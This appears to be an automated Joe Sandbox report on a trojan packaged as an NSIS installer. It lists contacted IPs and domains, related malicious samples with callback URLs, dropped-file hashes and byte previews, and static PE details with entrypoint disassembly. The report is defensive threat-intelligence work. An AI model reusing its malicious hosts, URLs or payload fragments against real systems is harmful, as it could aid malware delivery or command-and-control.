                              http://www.tiro.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://nsis.sf.net/NSIS_ErrorErrorSX365783909782021.exefalse
                                  		high
                                  http://www.goodfont.co.krexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                      		high
                                      http://nsis.sf.net/NSIS_ErrorSX365783909782021.exefalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fonts.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sakkal.comexplorer.exe, 00000003.00000000.227163717.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            142.250.180.243
                                            		ghs.googlehosted.comUnited States
                                            		15169GOOGLEUSfalse
                                            34.102.136.180
                                            		caravansforsalenorthwales.comUnited States
                                            		15169GOOGLEUSfalse
                                            168.235.88.209
                                            		parking.namesilo.comUnited States
                                            		3842RAMNODEUSfalse
                                            159.89.244.183
                                            		www.djspencer.comUnited States
                                            		14061DIGITALOCEAN-ASNUStrue

                                            General Information

                                            Joe Sandbox Version:32.0.0 Black Diamond
                                            Analysis ID:433214
                                            Start date:11.06.2021
                                            Start time:13:15:17
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 9s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:SX365783909782021.bat (renamed file extension from bat to exe)
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:24
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/4@4/4
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 24.5% (good quality ratio 22.4%)
                                            • Quality average: 75.5%
                                            • Quality standard deviation: 30.4%
                                            HCA Information:
                                            • Successful, ratio: 89%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.255.188.83, 40.88.32.150, 52.147.198.201, 184.30.20.56, 20.82.210.154, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.209.104
                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            168.235.88.209EDS03932,pdf.exeGet hashmaliciousBrowse
                                            • www.rechnung.pro/hw6d/?mL0XlT=Ddm3qJHqgzBdBhAnftzkfa9VwSzTwTX1J1BudaGH8hBPcPYq/VmKmGqlzWkIOMmg3Jwa27nFeQ==&cBZL=U8td9LP09nG8cn
                                            don.exeGet hashmaliciousBrowse
                                            • www.lanren.plus/uoe8/?BR=cjlpd&Y4plXns=tMPs/lCAJOvogVxKb5b8gcWtLLVD4pee8Rndx52EvkMBNrCA1tN1bmbJt/VCVDdzd/qq
                                            ZsA5S2nQAa.exeGet hashmaliciousBrowse
                                            • www.alpinevalleytimeshares.com/nsag/?Rx=nc5cR7fY8cj1BazpizuRFZBRA29btuqKtt0gl+AxZx4jZyN4s2dbmE6wVSL8q5zf2v8a&MJBD=FdFtDb28tZBh4rJP
                                            SHED.EXEGet hashmaliciousBrowse
                                            • www.servicesguidedata.com/r8pp/?T8Vh=VgA+V9dlqvhFAd2g5YDRlqwEUwSOXLZpnUVCzqpi7uV4yZFrT/qWWoxWPxTalBnvoZjj&-ZPl=1bdpal
                                            nova narud#U017eba.exeGet hashmaliciousBrowse
                                            • www.computercodecamp.com/fs8/?1b9Tzt1=U/dVVm2xwTFLDerdjbCDYRAG3ilhc39Y3/HlBm6zr75t2PsdnytLljzoCFBWJoJHXz0sh8CU1Q==&KtkPT=Ab8l7rXHZnC0w2DP
                                            New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                            • www.4winner.xyz/eao/?1bB0mR=2eKuYykfKT6E0YrQApY5J4vDJiqOigtFaVbxWGoO7nVxUHKG519x/DeD7eAHpFfAydzY&UPC=yvCdVR2
                                            159.89.244.183z2xQEFs54b.exeGet hashmaliciousBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              parking.namesilo.comtgb4.exeGet hashmaliciousBrowse
                                              • 45.58.190.82
                                              5.25.21.exeGet hashmaliciousBrowse
                                              • 70.39.125.244
                                              purchase order.docGet hashmaliciousBrowse
                                              • 188.164.131.200
                                              Glgcjrikwubeurawzvfntcaqnlnuvkpnql_Signed_.exeGet hashmaliciousBrowse
                                              • 70.39.125.244
                                              000192.xlsGet hashmaliciousBrowse
                                              • 198.251.81.30
                                              0ccd2703_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 198.251.84.92
                                              doc545567799890.exeGet hashmaliciousBrowse
                                              • 192.161.187.200
                                              EDS03932,pdf.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              don.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              PO_29_00412.exeGet hashmaliciousBrowse
                                              • 198.251.84.92
                                              2sj75tLtYO.exeGet hashmaliciousBrowse
                                              • 192.161.187.200
                                              Swift Copy Ref.xlsxGet hashmaliciousBrowse
                                              • 192.161.187.200
                                              wOPGM5LfSdNOEOp.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              Proforma Invoice.xlsxGet hashmaliciousBrowse
                                              • 204.188.203.155
                                              Complete Certificate.exeGet hashmaliciousBrowse
                                              • 192.161.187.200
                                              eQLPRPErea.exeGet hashmaliciousBrowse
                                              • 64.32.22.102
                                              vbc.exeGet hashmaliciousBrowse
                                              • 209.141.38.71
                                              Payment Slip.exeGet hashmaliciousBrowse
                                              • 192.161.187.200
                                              UTcQK0heAfGWTLw.exeGet hashmaliciousBrowse
                                              • 64.32.22.102
                                              RFQ # 1014397402856.pdf.exeGet hashmaliciousBrowse
                                              • 204.188.203.155

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              DIGITALOCEAN-ASNUSprocesshacker-2.39-setup.exeGet hashmaliciousBrowse
                                              • 162.243.25.33
                                              8BDBD0yy0q.apkGet hashmaliciousBrowse
                                              • 167.99.135.134
                                              8BDBD0yy0q.apkGet hashmaliciousBrowse
                                              • 167.99.135.134
                                              E1a92ARmPw.exeGet hashmaliciousBrowse
                                              • 161.35.179.108
                                              crt9O3URua.exeGet hashmaliciousBrowse
                                              • 161.35.179.108
                                              E1a92ARmPw.exeGet hashmaliciousBrowse
                                              • 161.35.179.108
                                              WcCEh3daIE.xlsGet hashmaliciousBrowse
                                              • 157.245.231.228
                                              UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                              • 157.245.232.77
                                              Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                              • 138.197.103.178
                                              46113.dllGet hashmaliciousBrowse
                                              • 157.245.231.228
                                              46113.dllGet hashmaliciousBrowse
                                              • 157.245.231.228
                                              Payment Copy.exeGet hashmaliciousBrowse
                                              • 68.183.229.215
                                              teX5sUCWAg.exeGet hashmaliciousBrowse
                                              • 161.35.179.108
                                              16X4iz8fTb.exeGet hashmaliciousBrowse
                                              • 139.59.176.201
                                              teX5sUCWAg.exeGet hashmaliciousBrowse
                                              • 161.35.179.108
                                              P M.exeGet hashmaliciousBrowse
                                              • 138.68.75.3
                                              Invoice number FV0062022020.exeGet hashmaliciousBrowse
                                              • 68.183.21.244
                                              03062021.exeGet hashmaliciousBrowse
                                              • 159.89.241.246
                                              85OpNw6eXm.exeGet hashmaliciousBrowse
                                              • 46.101.214.246
                                              JJ1PbTh0SP.dllGet hashmaliciousBrowse
                                              • 174.138.22.216
                                              RAMNODEUSEDS03932,pdf.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              seven#U5305#U88dd#U7167#U548c#U7455#U75b5#U7167-#U89e3#U58d3#U7e2e#U5bc6#U78bcm210511.exeGet hashmaliciousBrowse
                                              • 168.235.72.162
                                              wmac.exeGet hashmaliciousBrowse
                                              • 192.184.83.206
                                              don.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              .x86_64Get hashmaliciousBrowse
                                              • 168.235.95.104
                                              .x86_64Get hashmaliciousBrowse
                                              • 168.235.95.104
                                              v8iFmF7XPp.dllGet hashmaliciousBrowse
                                              • 168.235.67.138
                                              ZsA5S2nQAa.exeGet hashmaliciousBrowse
                                              • 168.235.88.209
                                              YpyXT7Tnik.exeGet hashmaliciousBrowse
                                              • 23.226.236.13
                                              2ojdmC51As.exeGet hashmaliciousBrowse
                                              • 168.235.67.138
                                              0HCan2RjnP.exeGet hashmaliciousBrowse
                                              • 107.161.23.204
                                              OZD Payment Information TT784677U.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              OZD Payment Information TT784677U.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              Invoice.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              Order-10236587458.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              Purchase Order22420.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              Concentracion de pedidos_PO.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              P_Order Flex Saneh.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              Purchase Order list.exeGet hashmaliciousBrowse
                                              • 168.235.93.122
                                              rfq02212021.exeGet hashmaliciousBrowse
                                              • 168.235.93.122

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dllmoq fob order.exeGet hashmaliciousBrowse
                                                0900000000000090000.exeGet hashmaliciousBrowse
                                                  444890321.exeGet hashmaliciousBrowse
                                                    Packing-List_00930039.exeGet hashmaliciousBrowse
                                                      2435.exeGet hashmaliciousBrowse
                                                        INVOICE.exeGet hashmaliciousBrowse
                                                          Shipment Invoice & Consignment Notification.exeGet hashmaliciousBrowse
                                                            KY4cmAI0jU.exeGet hashmaliciousBrowse
                                                              5t2CmTUhKc.exeGet hashmaliciousBrowse
                                                                8qdfmqz1PN.exeGet hashmaliciousBrowse
                                                                  New Order PO2193570O1.docGet hashmaliciousBrowse
                                                                    L2.xlsxGet hashmaliciousBrowse
                                                                      Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                        New Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
                                                                          2320900000000.exeGet hashmaliciousBrowse
                                                                            CshpH9OSkc.exeGet hashmaliciousBrowse
                                                                              5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                                i6xFULh8J5.exeGet hashmaliciousBrowse
                                                                                  AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                                    090049000009000.exeGet hashmaliciousBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Temp\lsemennd
                                                                                      Process:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):56673
                                                                                      Entropy (8bit):4.970773930948534
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:R20gYxZ/Kg7zfrOHzHyyukuUKFvL4D04U7YYRiFiswp:o05Z/Kg7HOHzKY0wYRiS
                                                                                      MD5:F95B23E6289D1281F61129ED8AC17124
                                                                                      SHA1:AB0A3D90CAC7E7B8A9E9856FB0E24F4B93498E0D
                                                                                      SHA-256:7DD01877C1A940E1D6E761AB769370B2CAF2BA2CC967082D7B12328E837518A8
                                                                                      SHA-512:9FDA413CE2E868B4F1BF8DFC4C65838525B22C892B18B52F591AAF1BF21C59E4FC73A7ADA8A5D22002ECF0AD2576AB0DD2C6FC6C3EBD2B4BEFBA1D4A547D3C56
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: U......#....D.....E.....F.....G...o.H...o.I.....J.....K...k.L.....M...-.N...s.O...o.P.....Q.....R...k.S.....T...k.U.....V...z.W...o.X...o.Y.....Z.....[.....\...o.]...:.^....._...G.`.....a...o.b...o.c...o.d.....e.....f.....g.....h.....i.....j.....k.....l...G.m...o.n.....o.....p.....q.....r.....s...1.t...o.u...o.v.....w.....x.....y.....z.....{.....|.....}.....~.........G.......................G.................:.........../...........o.....o.....o.................O...................................3................./.....o.............................3.....1.....o.....o.................3.......................3................./......................./.................:...........7...........o.....o.....o.......................................................................7.....o...................................1.....o.....o..................
                                                                                      C:\Users\user\AppData\Local\Temp\nsvDA2C.tmp
                                                                                      Process:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):276728
                                                                                      Entropy (8bit):7.477737961289009
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:w4YziQaUsVYAcvdY0yX/wcV0LbATJj92DkHUKY0kt:zYziQqVYVY0gwW04GSUKYN
                                                                                      MD5:913EAD302DB3A2438A73EA361174257A
                                                                                      SHA1:847631998D6B838A753B3794DFD9C7337CF9A9D0
                                                                                      SHA-256:D965EBAD5B2092374EF6C88CCE8E045DD0715A4BB45A59A8090232B034B21E3F
                                                                                      SHA-512:6F607C7327037E1F3F4DD476358A4387A34F4AE383D71DF15D9C4D861946FBF263E9E51EABEE92699CBB4ED86C76E7F62FF4AF470342178E3E5C78DA02F352CE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: .S......,.......................p=.......R......oS..........................................................................................................................................................................................................................................J...............!...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp\System.dll
                                                                                      Process:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):11776
                                                                                      Entropy (8bit):5.855045165595541
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                      MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                      SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                      SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                      SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: moq fob order.exe, Detection: malicious, Browse
                                                                                      • Filename: 0900000000000090000.exe, Detection: malicious, Browse
                                                                                      • Filename: 444890321.exe, Detection: malicious, Browse
                                                                                      • Filename: Packing-List_00930039.exe, Detection: malicious, Browse
                                                                                      • Filename: 2435.exe, Detection: malicious, Browse
                                                                                      • Filename: INVOICE.exe, Detection: malicious, Browse
                                                                                      • Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious, Browse
                                                                                      • Filename: KY4cmAI0jU.exe, Detection: malicious, Browse
                                                                                      • Filename: 5t2CmTUhKc.exe, Detection: malicious, Browse
                                                                                      • Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse
                                                                                      • Filename: New Order PO2193570O1.doc, Detection: malicious, Browse
                                                                                      • Filename: L2.xlsx, Detection: malicious, Browse
                                                                                      • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                      • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                      • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                      • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                      • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                      • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                      • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                      • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\Temp\ymhuzov3o2q1at
                                                                                      Process:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):186880
                                                                                      Entropy (8bit):7.999097081713126
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:xgst4EziQaY9ga+VYAcv3aGY0yXRsCz5ufmwytkQVPKLYkA2w7v0Ud9HIcZ2a:WYziQaUsVYAcvdY0yX/wcV0LbATJj92a
                                                                                      MD5:0A8021CB1A87799447CAE887D90E22BB
                                                                                      SHA1:D775275C6ECF3EE1FF9FECAF5830ED1E256D3E10
                                                                                      SHA-256:751DEE316732301CE8CD9AFBE4565814E3527D6B5E902AB3A43765915E812B36
                                                                                      SHA-512:EC5237A86866D9A2ABA7056B3DEA65278C4B7D527DEE4EBFD6BE07314144F9044D44F79CEE238A6C7D2750EA2C70C23A709BA876C28E36FC10AFA20A9F7340E6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: ./b.\\.c.u.m.$....M.r.\..[.G..%.....T....iW...R.G...#..k.0...C.q*.c.#.R..9.C.s.....f...r..*y.O...".....j..,e.}>Z..%......S...k..`.#......G2..^..r.'...RLS.MAmZMR..F.;3A.8..#P..^m..5.I+....>>...<.sUb.......X..b..r;..8X4?:P...t..H..._..A&x.c...r./.oz{._j.&:.h..<.n.Y7.i*./yD..K..I../UN....h..Z@.h+......@.....(.B>h..v...-.Cm.5y.A.U..$..Q.R.hA.j..4....c.M......h..9m.....e.Z...L.t@.........>(.....&..-2?j..S>.ZJ.9c..E...(.i..X......x.:....0...........v.C.F.\..#CQ.......id.L.z.#..........y%...:..Z.z.|..l..=..o....6.:...1F...w)..(z.-.....:Iy......{...YYC..R.S.m........n..j.x.["8P..r....#/......[.e".4&.'<s.,.(`1.nr|\.C...D.I..">..6.0.!..*r.......Ja..p.h".&8)hc.b.U=87.y.$@...G~.)gj..)........>.yH..c.j..m..../.Py...v@.....1..&...c,B*?..L9..;.....C.$W.|."_...},.f..d..q...[......@.{.yF..u.._...,........Z.Zj........C...$@..d.P.6...x.X.8....&C.........Ry$....c.'.......q..e..ZKy.eH...y`.y..]/..z.\....q..`R.7...t.<.<Y..0Q.ja.m.t.,.......@.^...

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                      Entropy (8bit):7.925274027835951
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:SX365783909782021.exe
                                                                                      File size:245880
                                                                                      MD5:ee1f4a07b874aa6ba18d6aa0f83252d3
                                                                                      SHA1:d17b97dc47707b685bc8976d3cbc6cdbfbd5fcee
                                                                                      SHA256:d66268222a39fd97e792983a3bacdb1e81067b7a28848a87fe65a5dc91f7e82a
                                                                                      SHA512:a9dad5dc2c70277d972b184a6177e07316f2e286b6597597f5d0a5095e3716d599b08dd8ca9339019bba48f847af90b68de0a06b1c947645d22eeddd1d41aab6
                                                                                      SSDEEP:6144:Ds9u96cRH4eb7DCIKDDsd5iCRFX7yYjjqe1/w:yprebPlWDmDFL5lI
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                      File Icon

                                                                                      Icon Hash:b2a88c96b2ca6a72

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x40323c
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:099c0646ea7282d232219f8807883be0

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      sub esp, 00000180h
                                                                                      push ebx
                                                                                      push ebp
                                                                                      push esi
                                                                                      xor ebx, ebx
                                                                                      push edi
                                                                                      mov dword ptr [esp+18h], ebx
                                                                                      mov dword ptr [esp+10h], 00409130h
                                                                                      xor esi, esi
                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                      call dword ptr [00407030h]
                                                                                      push 00008001h
                                                                                      call dword ptr [004070B4h]
                                                                                      push ebx
                                                                                      call dword ptr [0040727Ch]
                                                                                      push 00000008h
                                                                                      mov dword ptr [00423F58h], eax
                                                                                      call 00007F736CBA2E9Eh
                                                                                      mov dword ptr [00423EA4h], eax
                                                                                      push ebx
                                                                                      lea eax, dword ptr [esp+34h]
                                                                                      push 00000160h
                                                                                      push eax
                                                                                      push ebx
                                                                                      push 0041F458h
                                                                                      call dword ptr [00407158h]
                                                                                      push 004091B8h
                                                                                      push 004236A0h
                                                                                      call 00007F736CBA2B51h
                                                                                      call dword ptr [004070B0h]
                                                                                      mov edi, 00429000h
                                                                                      push eax
                                                                                      push edi
                                                                                      call 00007F736CBA2B3Fh
                                                                                      push ebx
                                                                                      call dword ptr [0040710Ch]
                                                                                      cmp byte ptr [00429000h], 00000022h
                                                                                      mov dword ptr [00423EA0h], eax
                                                                                      mov eax, edi
                                                                                      jne 00007F736CBA029Ch
                                                                                      mov byte ptr [esp+14h], 00000022h
                                                                                      mov eax, 00429001h
                                                                                      push dword ptr [esp+14h]
                                                                                      push eax
                                                                                      call 00007F736CBA2632h
                                                                                      push eax
                                                                                      call dword ptr [0040721Ch]
                                                                                      mov dword ptr [esp+1Ch], eax
                                                                                      jmp 00007F736CBA02F5h
                                                                                      cmp cl, 00000020h
                                                                                      jne 00007F736CBA0298h
                                                                                      inc eax
                                                                                      cmp byte ptr [eax], 00000020h
                                                                                      je 00007F736CBA028Ch
                                                                                      cmp byte ptr [eax], 00000022h
                                                                                      mov byte ptr [eax+eax+00h], 00000000h

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
